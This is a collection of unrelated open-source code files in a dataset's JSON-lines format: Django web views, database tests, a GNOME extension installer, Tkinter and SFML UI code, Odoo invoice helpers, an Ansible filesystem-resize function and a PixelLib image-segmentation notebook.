user\r\n title = record_form.cleaned_data['title']\r\n record = Records.objects.create(\r\n user=user, title=title, file=request.FILES['file'])\r\n if record:\r\n context['message_success'] = u'Сообщение добавлено'\r\n record_form = RecordForm()\r\n records = Records.objects.filter(user=user)\r\n context['record_form'] = record_form\r\n context['user'] = user\r\n context['records'] = records\r\n return render_to_response('records.html', context)\r\n else:\r\n return redirect(reverse('inform:index'))\r\n\r\n\r\ndef statistic(request):\r\n user = auth.get_user(request)\r\n if user.is_authenticated():\r\n page_number = request.GET.get('pn') or 1\r\n context = {}\r\n context.update(csrf(request))\r\n statistic_form = StatisticSearch(request.POST or None)\r\n statistic_all = Statistics.objects.filter(user=user)\r\n statistic_curr = Paginator(statistic_all, 10)\r\n context['user'] = user\r\n context['statistics'] = statistic_curr.page(page_number)\r\n context['statistic_form'] = statistic_form\r\n return render_to_response('statistic.html', context)\r\n else:\r\n return redirect(reverse('inform:index'))\r\n\r\n\r\ndef export(request):\r\n user = auth.get_user(request)\r\n if user.is_authenticated():\r\n myQuery = Q(user=user)\r\n statistic_filtered = Statistics.objects.filter(myQuery)\r\n response = HttpResponse(content_type='text/csv')\r\n writer = csv.writer(response, delimiter=';')\r\n writer.writerow([u'Имя клиента'.encode('cp1251'),\r\n u'Телефон'.encode('cp1251'),\r\n u'Сообщение'.encode('cp1251'),\r\n u'Дата звонка'.encode('cp1251'),\r\n u'Время звонка'.encode('cp1251'),\r\n u'Статус'.encode('cp1251')])\r\n for row in statistic_filtered:\r\n name = row.name.encode('cp1251')\r\n phone = row.phone\r\n record = row.record.encode('cp1251')\r\n date = row.date\r\n time = row.time\r\n status = row.status\r\n writer.writerow([name, phone, record, date, time, status])\r\n time_now = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M')\r\n response['Content-Disposition'] = 'attachment; filename=\"' + time_now + '.csv\"'\r\n return response\r\n else:\r\n return redirect(reverse('inform:index'))\r\n\r\n\r\ndef remove_client(request):\r\n user = auth.get_user(request)\r\n if user.is_authenticated():\r\n to_delete = request.GET.get('rm')\r\n if to_delete == 'all':\r\n Clients.objects.filter(user=user).delete()\r\n else:\r\n try:\r\n Clients.objects.get(id=to_delete).delete()\r\n except ObjectDoesNotExist:\r\n print('no object %s' % to_delete)\r\n pass\r\n return redirect(reverse('inform:clients'))\r\n else:\r\n return redirect(reverse('inform:index'))\r\n\r\n\r\ndef remove_record(request):\r\n user = auth.get_user(request)\r\n if user.is_authenticated():\r\n to_delete = request.GET.get('rm')\r\n if to_delete == 'all':\r\n Records.objects.filter(user=user).delete()\r\n else:\r\n try:\r\n Records.objects.get(id=to_delete).delete()\r\n except ObjectDoesNotExist:\r\n print('no object %s' % to_delete)\r\n pass\r\n return redirect(reverse('inform:records'))\r\n else:\r\n return redirect(reverse('inform:index'))\r\n\r\n\r\ndef start_inform(request):\r\n user = auth.get_user(request)\r\n if user.is_authenticated():\r\n context = {}\r\n context.update(csrf(request))\r\n clients_all = Clients.objects.filter(user=user)\r\n context = {\r\n 'user': user,\r\n 'clients': clients_all,\r\n }\r\n return render_to_response('startinform.html', context)\r\n else:\r\n return redirect(reverse('inform:index'))\r\n","sub_path":"inform/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"98467668","text":"import os\nimport sqlite3\nimport unittest\n\nfrom mmvizutil.db.query import (\n Query,\n db_query_df,\n db_query_list,\n query_bar,\n query_scatter\n)\n\nfrom mmvizutil.db.sqlite import (\n query_box\n)\n\ndef db_sqlite_path(fname):\n cur_dir = os.path.dirname(os.path.realpath(__file__))\n return os.path.join(cur_dir, fname)\n\nDB_FILE_PATH = db_sqlite_path(\"data/customer.db\")\n\n\ndef db_query_customer():\n\n query = Query()\n query.value = \"select income num_1, travel_spending num_2, state cat_1 from customer\"\n\n return query\n\n\nclass TestSqliteQuery(unittest.TestCase):\n\n def test_query_list(self):\n\n with sqlite3.connect(DB_FILE_PATH) as connection:\n result = db_query_list(connection, db_query_customer())\n print(result)\n\n def test_query_df(self):\n with sqlite3.connect(DB_FILE_PATH) as connection:\n result = db_query_df(connection, db_query_customer())\n print(result)\n\n def test_query_box_df(self):\n with sqlite3.connect(DB_FILE_PATH) as connection:\n result = db_query_df(connection, query_box(db_query_customer()))\n print(result)\n\n def test_query_bar_df(self):\n with sqlite3.connect(DB_FILE_PATH) as connection:\n result = db_query_df(connection, query_bar(db_query_customer()))\n print(result)\n\n def test_query_scatter_df(self):\n with sqlite3.connect(DB_FILE_PATH) as connection:\n result = db_query_df(connection, query_scatter(db_query_customer(), \"max\", \"avg\"))\n print(result)\n\n# def main():\n# result = db_sqlite_query_df(db_query_customer_income())\n# print(result)\n#\n# if __name__ == \"__main__\": main()","sub_path":"test/sqlite/test_db_query.py","file_name":"test_db_query.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"164556785","text":"#!/usr/bin/python3\nimport os, requests, json, lxml.html, subprocess, zipfile, shutil, re\n\nclass ExtensionManager():\n\n def __init__(self):\n self.extensions_local_path = os.getenv(\"HOME\") + \"/.local/share/gnome-shell/extensions/\"\n self.extensions_sys_path = \"/usr/share/gnome-shell/extensions/\"\n self.results = []\n self.installed = self.list_all_extensions()\n self.version = self.run_command(\"gnome-shell --version\").split()[2]\n \n def run_command(self, command):\n return subprocess.Popen(command, shell=True, stdout=subprocess.PIPE).stdout.read().decode() \n\n def list_all_extensions(self):\n installed_extensions = []\n uuids = self.list_user_extensions() + self.list_system_extensions()\n enabled_extensions = re.findall(r'\\'(.+?)\\'', self.run_command(\"gsettings get org.gnome.shell enabled-extensions\"))\n for uuid in uuids:\n extension_local_path = self.extensions_local_path + uuid\n extension_sys_path = self.extensions_sys_path + uuid\n\n extension_data = {\"uuid\": uuid, \"local\": self.extension_is_local(uuid)}\n if uuid in enabled_extensions:\n extension_data[\"enabled\"] = True\n else:\n extension_data[\"enabled\"] = False\n if extension_data[\"local\"] == True:\n metadata = open(extension_local_path + \"/metadata.json\", \"r\").read()\n else:\n metadata = open(extension_sys_path + \"/metadata.json\").read()\n metadata = json.loads(metadata)\n\n # Check for preferences\n if os.path.exists(extension_sys_path + \"/prefs.js\") or os.path.exists(extension_local_path + \"/prefs.js\"):\n extension_data[\"prefs\"] = True\n else:\n extension_data[\"prefs\"] = False\n\n extension_data[\"name\"] = metadata[\"name\"]\n installed_extensions.append(extension_data)\n return installed_extensions\n \n def extension_is_local(self, uuid):\n if uuid in self.list_user_extensions():\n return True\n else:\n return False\n\n def list_system_extensions(self):\n return os.listdir(self.extensions_sys_path)\n\n def list_user_extensions(self):\n try:\n return os.listdir(self.extensions_local_path)\n except FileNotFoundError:\n os.mkdir(self.extensions_local_path)\n return os.listdir(self.extensions_local_path)\n\n def search(self, query):\n try:\n response = self.get_request(\"https://extensions.gnome.org/extension-query/?page=1&search=\" + query)\n except:\n raise\n return \n self.results = json.loads(response.text)[\"extensions\"]\n\n def get_extensions(self, uuid):\n # Parse the extension webpage and get the json from the data-svm element\n url = \"https://extensions.gnome.org\" + self.results[self.get_index(uuid)][\"link\"]\n try:\n response = self.get_request(url)\n except:\n raise\n\n root = lxml.html.fromstring(response.text)\n content = root.xpath(\"/html/body/div[2]/div/div[2]/@data-svm\")[0]\n releases = json.loads(content)\n\n # Get matching version\n extension_id = \"\"\n\n # Iterate through the different releases and get the matching one for your gnome version and failsafe to the lastest release\n subversions = []\n for key, value in releases.items():\n subversions.append(float(key[2:]))\n\n if self.version.startswith(str(key)):\n extension_id = str(value[\"pk\"])\n \n # If the ID doesn't start with your current version, get the highest one\n if extension_id == \"\":\n\n # Use re to remove .0 from the float conversion above\n max_subversion = re.sub('\\.0$', '', str(max(subversions)))\n highest_version = \"3.\" + max_subversion\n extension_id = str(releases[highest_version][\"pk\"])\n\n # Download and install\n try:\n self.download(\"https://extensions.gnome.org/download-extension/\" + uuid + \".shell-extension.zip?version_tag=\" + extension_id, uuid)\n self.install(uuid)\n except:\n raise\n\n def get_index(self, uuid):\n for index, entry in enumerate(self.results):\n if entry[\"uuid\"] == uuid:\n return index\n \n def get_uuid(self, index):\n return self.results[index][\"uuid\"]\n\n def download(self, url, uuid):\n try:\n response = self.get_request(url)\n with open(self.get_zip_path(uuid), \"wb\") as file:\n file.write(response.content)\n print(\"Downloaded \" + uuid)\n except:\n raise\n\n def remove(self, uuid):\n install_path = self.extensions_local_path + uuid\n if os.path.isdir(install_path):\n print(\"Deleting \" + uuid)\n try:\n shutil.rmtree(install_path)\n except:\n raise\n self.installed = self.list_all_extensions()\n \n def get_image(self, uuid):\n url = \"https://extensions.gnome.org\" + self.results[self.get_index(uuid)][\"icon\"]\n if url == \"https://extensions.gnome.org/static/images/plugin.png\":\n return None\n try:\n response = self.get_request(url)\n return response.content\n except:\n raise\n \n def get_request(self, url):\n response = requests.get(url)\n if response == None:\n raise\n return\n return response\n \n def set_extension_status(self, uuid, status):\n self.run_command(\"gnome-extensions \" + status + \" \" + uuid)\n \n def get_zip_path(self, uuid):\n return \"/tmp/\" + uuid + \".zip\"\n\n def install(self, uuid):\n # Remove old extension \n self.remove(uuid)\n zip_path = self.get_zip_path(uuid)\n\n # Create new folder with matching uuid and extract to it\n install_path = self.extensions_local_path + uuid\n\n try:\n os.mkdir(install_path)\n with zipfile.ZipFile(zip_path,\"r\") as zip_ref:\n zip_ref.extractall(install_path)\n os.remove(zip_path)\n self.installed = self.list_all_extensions()\n print(\"Installed \" + uuid)\n \n except:\n raise\n\n\n\n","sub_path":"extensionmanager/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"549300844","text":"# _*_ coding: utf-8 _*_\r\nfrom Tkinter import* \r\n\r\nmaster = Tk() # 创建根窗口\r\n\r\nlistbox = Listbox(master) # 引入Listbox组件,创建消息窗口\r\nlistbox.pack() # 组块\r\n\r\nlistbox.insert(END, \"a list entry\") # 输出某值\r\n\r\nfor item in range(0,30): # 输出列表元素,与本次任务吻合\r\n\tlistbox.insert(END, item)\r\n\r\nmainloop() # 进入消息循环,否则无法显示界面\r\n\r\n","sub_path":"_src/om2py2w/2wex0/tk_listbox.py","file_name":"tk_listbox.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"204730767","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _ \nimport logging\n_logger = logging.getLogger(__name__)\n\nclass AccountInvoice(models.Model):\n\t_inherit = 'account.invoice'\n\n\t@api.multi\n\tdef get_bom_details_summary(self):\n\t\tif self.invoice_line_ids: \n\t\t\tproduct_bom_list = {}\n\t\t\tfor invoice_id in self.invoice_line_ids:\n\t\t\t\tbom_obj = self.env['mrp.bom'].search([('product_tmpl_id','=', invoice_id.product_id.product_tmpl_id.id),\n\t\t\t\t\t\t\t\t\t\t\t\t\t ('company_id','=', self.company_id.id),\n\t\t\t\t\t\t\t\t\t\t\t\t\t ('type','=', 'phantom')], limit=1)\n\t\t\t\tif bom_obj:\n\t\t\t\t\tquantity_converted = invoice_id.quantity / bom_obj.product_qty\n\t\t\t\t\tbom_ctr = 1\n\n\t\t\t\t\tfor line_id in bom_obj.bom_line_ids:\n\t\t\t\t\t\tif line_id.id != bom_obj.bom_line_ids.ids[0]:\n\n\t\t\t\t\t\t\tnames = str(line_id.product_id.id) + 'UOM' + str(line_id.product_uom_id.id)\n\t\t\t\t\t\t\tproduct_name = line_id.product_id.name\n\n\t\t\t\t\t\t\tif line_id.product_id.description_sale:\n\t\t\t\t\t\t\t\tproduct_name = line_id.product_id.description_sale\n\n\t\t\t\t\t\t\tif names not in product_bom_list:\n\t\t\t\t\t\t\t\tproduct_bom_list[names] = [\n\t\t\t\t\t\t\t\t\tproduct_name,\n\t\t\t\t\t\t\t\t\tline_id.product_uom_id,\n\t\t\t\t\t\t\t\t\tquantity_converted * line_id.product_qty]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tproduct_bom_list[names][2] += (quantity_converted * line_id.product_qty)\n\t\t\t\t\t\t\tbom_ctr +=1\n\t\t\treturn product_bom_list\n\t\treturn False\n\n\n\nclass AccountInvoiceLine(models.Model):\n\t_inherit = 'account.invoice.line'\n\n\t@api.multi\n\tdef get_product_bom_details(self):\n\t\tself.ensure_one()\n\t\tbom_obj = self.env['mrp.bom'].search([('product_tmpl_id','=', self.product_id.product_tmpl_id.id),\n\t\t\t\t\t\t\t\t\t\t ('company_id','=', self.company_id.id),\n\t\t\t\t\t\t\t\t\t\t ('type','=', 'phantom')], limit=1)\n\t\tif bom_obj:\n\t\t\t#raise Warning(bom_obj.bom_line_ids[1:])\n\t\t\treturn bom_obj.bom_line_ids[0]\n\n\t\treturn False\n\n\n\n\n\n\n\n# class goodheart(models.Model):\n# _name = 'goodheart.goodheart'\n# name = fields.Char()\n# value = fields.Integer()\n# value2 = fields.Float(compute=\"_value_pc\", store=True)\n# description = fields.Text()\n#\n# @api.depends('value')\n# def _value_pc(self):\n# self.value2 = float(self.value) / 100\n","sub_path":"gh_shoot_so_coneland/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"88024018","text":"import re\n\n\ndef calculate():\n fo = open(\"data.txt\", \"r+\")\n lines = fo.readlines()\n total = 0\n grp = []\n for line in lines:\n line = line.strip()\n if line == \"\":\n total += group_sum(grp)\n grp = []\n else:\n grp.append(line)\n\n total += group_sum(grp)\n return total\n\ndef group_sum(lines):\n group_results = 0\n for line in lines:\n group_results |= person_binary(line)\n return sum(int(b) for b in \"{0:b}\".format(group_results))\n\ndef person_binary(answers):\n hash = 0\n for letter in answers:\n hash |= 2**order_number(letter)\n return hash\n\ndef order_number(letter):\n return ord(letter) - ord('a')\n","sub_path":"day06a/program_lib.py","file_name":"program_lib.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"516663146","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom rest_framework import permissions\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom picpay.search import *\n\nfrom .secrets import *\n\n__author__ = 'Roberto Morati '\n__copyright__ = ' Copyright (c) 2017'\n__version__ = '0.0.1'\n\n\nclass InfoSearchViewSet(APIView):\n \"\"\"\n title: Basic Info to start the Search\n\n * description: Return the informations that are necessary to use the service api.v1.search\"\n\n * retrieve: token to start the search\n \"\"\"\n permission_classes = (permissions.AllowAny,)\n\n def get(self, request, *args, **kw):\n\n infs = {}\n if 'data_search' in kw:\n infs = info_search(kw['data_search'])\n else:\n infs = info_search()\n\n if 'success' in infs:\n for key in list(request.session.keys()):\n del request.session[key]\n request.session.modified = True\n\n token = token_hex(6)\n request.session[token] = infs\n\n response = {}\n response['pages'] = infs['pages']\n response['total'] = infs['total']\n response['success'] = infs['success']\n response['token'] = token\n print(\"token : \" + str(response['token']))\n else:\n response = {}\n response['error'] = infs['error']\n return Response(response, status=status.HTTP_200_OK)\n\n\nclass UserSearchViewSet(APIView):\n \"\"\"\n title: Search by users\n\n * description: Return the informations about users.\n\n * retrieve: users (id, username and fullname)\n \"\"\"\n\n permission_classes = (permissions.AllowAny,)\n\n def get(self, request, *args, **kw):\n response = {}\n if 'token' in kw:\n if kw['token'] in request.session:\n if 'data_search' in kw:\n if not (kw['data_search'] == request.session[kw['token']]['data_search']):\n response['error'] = 'data_search invalid'\n else:\n response = search(data_search=kw['data_search'], info_search=request.session[kw['token']], page=(int(kw['page']) - 1))\n else:\n if not ('data_search' in kw):\n if request.session[kw['token']]['data_search'] is not None:\n response['error'] = 'data_search invalid'\n else:\n response = search(info_search=request.session[kw['token']], page=(int(kw['page']) - 1))\n else:\n response['error'] = 'invalid token'\n return Response(response, status=status.HTTP_200_OK)\n","sub_path":"api/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"275796404","text":"def resize_fs(module, filesystem, size):\n ' Resize LVM file system. '\n chfs_cmd = module.get_bin_path('chfs', True)\n if (not module.check_mode):\n (rc, chfs_out, err) = module.run_command(('%s -a size=\"%s\" %s' % (chfs_cmd, size, filesystem)))\n if (rc == 28):\n changed = False\n return (changed, chfs_out)\n elif (rc != 0):\n if re.findall('Maximum allocation for logical', err):\n changed = False\n return (changed, err)\n else:\n module.fail_json('Failed to run chfs.', rc=rc, err=err)\n else:\n if re.findall('The filesystem size is already', chfs_out):\n changed = False\n else:\n changed = True\n return (changed, chfs_out)\n else:\n changed = True\n msg = ''\n return (changed, msg)","sub_path":"Data Set/bug-fixing-3/75724bb7cabcdd78eed0ee3435b056e75db315ee--bug.py","file_name":"75724bb7cabcdd78eed0ee3435b056e75db315ee--bug.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"537033116","text":"#encoding=utf-8\nfrom django.shortcuts import render, render_to_response\n\n# Create your views here.\nfrom blogs.models import passage\n\n\ndef home(req):\n posts = []\n\n return render_to_response(\"pages/home.html\", {\"posts\":posts})\n\ndef example_home(req):\n posts = []\n\n raws = passage.objects.filter()[:10]\n for blograw in raws:\n if blograw.type == 1:\n standard_post = {}\n standard_post[\"id\"] = blograw.id\n standard_post[\"type\"] = blograw.type\n standard_post[\"title\"] = blograw.title\n standard_post[\"text\"] = blograw.text\n standard_post[\"time\"] = blograw.time\n standard_post[\"author\"] = blograw.author\n standard_post[\"href\"] = blograw.href\n standard_post[\"tags\"] = blograw.tags.split(\"|\")\n posts.append(standard_post)\n elif blograw.type == 2:\n gallary_post = {}\n gallary_post[\"id\"] = blograw.id\n gallary_post[\"imgs\"] = blograw.quote.split(\"|\")\n gallary_post[\"type\"] = 2\n gallary_post[\"title\"] = \"测试文章\"\n gallary_post[\"text\"] = blograw.text\n gallary_post[\"time\"] = blograw.time\n gallary_post[\"author\"] = blograw.author\n gallary_post[\"href\"] = blograw.href\n gallary_post[\"tags\"] = blograw.tags.split(\"|\")\n\n posts.append(gallary_post)\n elif blograw.type == 3:\n youtube_post = {}\n youtube_post[\"id\"] = blograw.id\n youtube_post[\"ylink\"] = blograw.link\n youtube_post[\"type\"] = 3\n youtube_post[\"title\"] = \"测试文章\"\n youtube_post[\"text\"] = blograw.text\n youtube_post[\"time\"] = blograw.time\n youtube_post[\"author\"] = blograw.author\n youtube_post[\"href\"] = blograw.href\n youtube_post[\"tags\"] = blograw.tags.split(\"|\")\n posts.append(youtube_post)\n elif blograw.type == 4:\n link_post = {}\n link_post[\"id\"] = blograw.id\n link_post[\"link\"] = \"http://www.wrapbootstrap.com/\"\n link_post[\"type\"] = 4\n link_post[\"title\"] = \"测试文章\"\n link_post[\"text\"] = blograw.text\n link_post[\"time\"] = blograw.time\n link_post[\"author\"] = blograw.author\n link_post[\"href\"] = blograw.href\n link_post[\"tags\"] = blograw.tags.split(\"|\")\n posts.append(link_post)\n elif blograw.type == 5:\n quote_post = {}\n quote_post[\"id\"] = blograw.id\n quote_post[\"quote\"] = blograw.quote\n quote_post[\"type\"] = 5\n quote_post[\"author\"] = blograw.author\n posts.append(quote_post)\n\n\n\n pages = [[1, \"\"], [2, \"\"], [3, \"\"]]\n current_page = 2\n tags = [[\"Java\", \"/tag/java\"], [\"Python\", \"/tag/python\"], [\"NLP\", \"/tag/nlp\"], [\"Machine Learning\", \"/tag/ml\"]]\n\n return render_to_response(\"pages/home.html\", {\"posts\":posts, \"pages\":pages, \"current_page\":current_page, \"tags\":tags})\n\n\ndef blog(req, bid=0):\n blograw = passage.objects.get(id=bid)\n post = {}\n if blograw.type == 1:\n post[\"id\"] = blograw.id\n post[\"type\"] = blograw.type\n post[\"title\"] = blograw.title\n post[\"text\"] = blograw.text\n post[\"time\"] = blograw.time\n post[\"author\"] = blograw.author\n post[\"href\"] = blograw.href\n post[\"tags\"] = blograw.tags.split(\"|\")\n elif blograw.type == 2:\n post[\"id\"] = blograw.id\n post[\"imgs\"] = blograw.quote.split(\"|\")\n post[\"type\"] = 2\n post[\"title\"] = \"测试文章\"\n post[\"text\"] = blograw.text\n post[\"time\"] = blograw.time\n post[\"author\"] = blograw.author\n post[\"href\"] = blograw.href\n post[\"tags\"] = blograw.tags.split(\"|\")\n elif blograw.type == 3:\n post[\"id\"] = blograw.id\n post[\"ylink\"] = blograw.link\n post[\"type\"] = 3\n post[\"title\"] = \"测试文章\"\n post[\"text\"] = blograw.text\n post[\"time\"] = blograw.time\n post[\"author\"] = blograw.author\n post[\"href\"] = blograw.href\n post[\"tags\"] = blograw.tags.split(\"|\")\n elif blograw.type == 4:\n post[\"id\"] = blograw.id\n post[\"link\"] = \"http://www.wrapbootstrap.com/\"\n post[\"type\"] = 4\n post[\"title\"] = \"测试文章\"\n post[\"text\"] = blograw.text\n post[\"time\"] = blograw.time\n post[\"author\"] = blograw.author\n post[\"href\"] = blograw.href\n post[\"tags\"] = blograw.tags.split(\"|\")\n elif blograw.type == 5:\n post[\"id\"] = blograw.id\n post[\"quote\"] = blograw.quote\n post[\"type\"] = 5\n post[\"author\"] = blograw.author\n\n return render_to_response(\"pages/blog.html\", {\"bid\":bid, \"post\":post})\n\ndef publish(req):\n return render_to_response(\"pages/publish.html\")\n\n# Create your views here.\ndef about(req):\n return render_to_response(\"pages/about.html\", {})\n\n# Create your views here.\ndef contact(req):\n return render_to_response(\"pages/about.html\", {})\n\n# Create your views here.\ndef works(req):\n return render_to_response(\"pages/about.html\", {})\n","sub_path":"blogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"168269219","text":"import sf\nimport resourcemanager\n\nclass Menu (object):\n def __init__ (self, game, width = 50):\n self.game = game\n\n self.x = 0\n self.y = 0\n self.width = width\n \n self.font = resourcemanager.get('font.menu')\n \n self.entries = []\n self.selected_index = 0\n\n self.input = []\n \n def add_title (self, label, label_size=24):\n self.add_entry(None, label, label_size)\n\n def add_entry (self, widget, label=None, label_size=24):\n ''' append an entry to the menu\n None widgets will be treated as separators/titles '''\n \n if widget: widget.menu = self\n \n entry = {\n 'label': sf.Text(label, self.font, label_size) if label else None,\n 'widget': widget\n }\n \n self.entries.append(entry)\n \n this_index = self.entries.index(entry)\n \n if this_index > 0:\n # if previous entry is unselectable, make this one the selected one\n if self.entries[this_index-1]['widget'] == None:\n self.selected_index = this_index\n\n def change_selected(self, index):\n if not index == self.selected_index:\n self.selected_index = index\n resourcemanager.get(\"sound.menu_change\").play()\n \n def execute_action(self):\n \n resourcemanager.get(\"sound.menu_select\").play()\n \n entry = self.entries[self.selected_index]\n entry['callback'](entry['data']) if entry['data'] else entry['callback']()\n\n def update (self, input):\n mx, my = sf.Mouse.get_position(self.game.window)\n\n index_changed = False\n execute_action = False\n index = self.selected_index\n \n if input['up']:\n\n if index == 0:\n index = len(self.entries)-1\n else:\n index -= 1\n \n index_changed = True\n \n elif input['down']:\n \n if index == len(self.entries)-1:\n index = 0\n else:\n index += 1\n \n index_changed = True\n \n for i, entry in enumerate(self.entries):\n if entry['widget']:\n entry['widget'].dehilight()\n\n local_bounds = sf.FloatRect()\n \n if entry['widget']:\n local_bounds.left = entry['widget'].x\n local_bounds.top = entry['widget'].y\n local_bounds.height = entry['widget'].height\n\n if entry['label']:\n local_bounds.left = entry['label'].x\n local_bounds.top = entry['label'].y\n local_bounds.height = entry['label'].local_bounds.height\n \n local_bounds.width = self.width\n \n if local_bounds.contains(mx, my) and entry['widget']:\n index = i\n index_changed = True\n \n if sf.Mouse.is_button_pressed(sf.Mouse.LEFT):\n input['confirm'] = True\n\n if index_changed:\n if self.entries[index]['widget'] == None:\n self.selected_index = index\n self.update(input)\n return # avoid using invalid index because recursion\n\n self.change_selected(index)\n \n self.entries[self.selected_index]['widget'].hilight()\n self.entries[self.selected_index]['widget'].update(input)\n\n def render (self, target):\n offset = 0\n i = 0\n for i, entry in enumerate(self.entries):\n lh = 0\n if entry['label']:\n entry['label'].x = self.x\n entry['label'].y = self.y + offset\n \n if self.selected_index == i:\n entry['label'].color = sf.Color.CYAN\n else:\n entry['label'].color = sf.Color.WHITE\n \n target.draw(entry['label'])\n lh = entry['label'].local_bounds.height\n\n wh = 0\n if entry['widget']:\n entry['widget'].x = self.x\n if entry['label']: entry['widget'].x += entry['label'].local_bounds.width + 10\n\n entry['widget'].y = self.y + offset\n entry['widget'].render(target)\n \n wh = entry['widget'].height\n\n offset += max(lh, wh) + 2\n\nclass Widget (object):\n def __init__ (self):\n self.x = 0\n self.y = 0\n\n self.menu = None\n self.color = sf.Color.WHITE\n \n def dehilight (self):\n self.color = sf.Color.WHITE\n\n def hilight (self):\n self.color = sf.Color.CYAN\n\n def update (self, input):\n pass\n\n def render(self, target):\n pass\n\nclass Button (Widget):\n def __init__ (self, label_text, width=100, height=25, callback=None, data=None, text_size=24):\n super(Button, self).__init__()\n self.width = width\n self.height = height\n\n self.label_text = label_text\n self.label_text_size = text_size\n self.label = None\n \n self.connect(callback, data)\n\n def connect (self, callback, data=None):\n self.callback = callback\n self.data = data\n\n def activate (self):\n resourcemanager.get(\"sound.menu_select\").play()\n\n if self.callback:\n if self.data:\n self.callback(self.data)\n else:\n self.callback()\n\n def update (self, input):\n if input['confirm']:\n self.activate()\n\n def render (self, target):\n if self.label == None:\n self.label = sf.Text(self.label_text, self.menu.font, self.label_text_size)\n\n self.label.x = self.x\n self.label.y = self.y\n self.label.color = self.color\n\n target.draw(self.label)\n\nclass Slider (Widget):\n def __init__ (self, width=200):\n super(Slider, self).__init__()\n\n self.height = 25\n self.width = width\n\n self.x = 0\n self.y = 0\n\n self.slide = sf.RectangleShape((10, 10))\n self.slide.origin = (5, 5)\n\n self.value = 0\n self.grabbed = False\n \n def update (self, input):\n mx, my = sf.Mouse.get_position(self.menu.game.window)\n\n local_bounds = sf.FloatRect(\n self.x, self.y,\n self.width, self.height\n )\n\n if local_bounds.contains(mx ,my):\n if sf.Mouse.is_button_pressed(sf.Mouse.LEFT):\n self.grabbed = True\n\n if self.grabbed:\n if sf.Mouse.is_button_pressed(sf.Mouse.LEFT):\n self.value = ((mx - self.x) / float(self.width)) * 100\n else:\n self.grabbed = False\n\n if input['left']:\n self.value -= 1\n elif input['right']:\n self.value += 1\n\n # clamp within [0, 100]\n self.value = max(0, min(self.value, 100))\n\n def render (self, target):\n line = sf.RectangleShape((self.width,1))\n line.x = self.x\n line.y = self.y + self.height/1.5\n line.fill_color = self.color\n\n self.slide.x = self.x + self.width * (self.value/100.0)\n self.slide.y = line.y\n self.slide.fill_color = self.color\n\n target.draw(line)\n target.draw(self.slide) \n","sub_path":"lapsus/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":7369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"598142320","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Image Segmentation Using Python's PixelLib Package: \n# Last modified: July 13, 2021\n\n# ## Useful links / Citations:\n# https://towardsdatascience.com/custom-instance-segmentation-training-with-7-lines-of-code-ff340851e99b\n# https://pixellib.readthedocs.io/en/latest/custom_inference.html\n\n# ## Import PixelLib and load random training photo:\n# Shows a random training photo with handpicked mask polygon from LabelMe annotation.\n# Run cell multiple times to make sure your image annotations are showing up as expected.\n\n# In[1]:\n\n\nimport pixellib\nfrom pixellib.custom_train import instance_custom_training\n\nvis_img = instance_custom_training()\nvis_img.load_dataset(\"/Users/sebastianperezlopez/Desktop/PixelLabTesting/SeepageDatasetNEW.nosync\")\nvis_img.visualize_sample()\n\n\n# ## Train model\n# Load MaskRCNN model, load pre-trained coco weights, set batch size / epochs / data augmentation\n\n# In[3]:\n\n\nimport pixellib\nfrom pixellib.custom_train import instance_custom_training\n\ntrain_maskrcnn = instance_custom_training()\ntrain_maskrcnn.modelConfig(network_backbone = \"resnet101\", num_classes= 1, batch_size = 4)\ntrain_maskrcnn.load_pretrained_model(\"/Users/sebastianperezlopez/Desktop/PixelLabTesting/COCO Model.nosync/mask_rcnn_coco.h5\")\ntrain_maskrcnn.load_dataset(\"/Users/sebastianperezlopez/Desktop/PixelLabTesting/SeepageDatasetNEW.nosync\")\ntrain_maskrcnn.train_model(num_epochs = 4, augmentation=False, path_trained_models = \"/Users/sebastianperezlopez/Desktop/PixelLabTesting/mask_rcnn_models.nosync\")\n\n\n# ## Create segmentation mask on new image using trained model \n# Photo output showing predicted mask over original photo\n# \n# *Set extract_segmented_objects=True if you want a .jpg file with only the segmented part of your original showing. Will appear in the directory of your .ipynb file. \n\n# In[21]:\n\n\n# Save extracted object (what mask predicts) as a separate file\nimport pixellib\nfrom pixellib.instance import custom_segmentation\n\nsegment_image = custom_segmentation()\nsegment_image.inferConfig(num_classes= 1, class_names= [\"BG\", \"seepage\"])\nsegment_image.load_model('/Users/sebastianperezlopez/Desktop/PixelLabTesting/mask_rcnn_models.nosync/Epoch2_16July') # Put filename of .h5 that has weights you just trained\nsegment_image.segmentImage(\"/Users/sebastianperezlopez/Desktop/framefolder.nosync/raw frames/_frame16500.jpg\", show_bboxes=False, output_image_name=\"/Users/sebastianperezlopez/Desktop/framefolder.nosync/mask+image/_frame16500.jpg\", extract_segmented_objects=False, save_extracted_objects=True)\n\n\n\n# 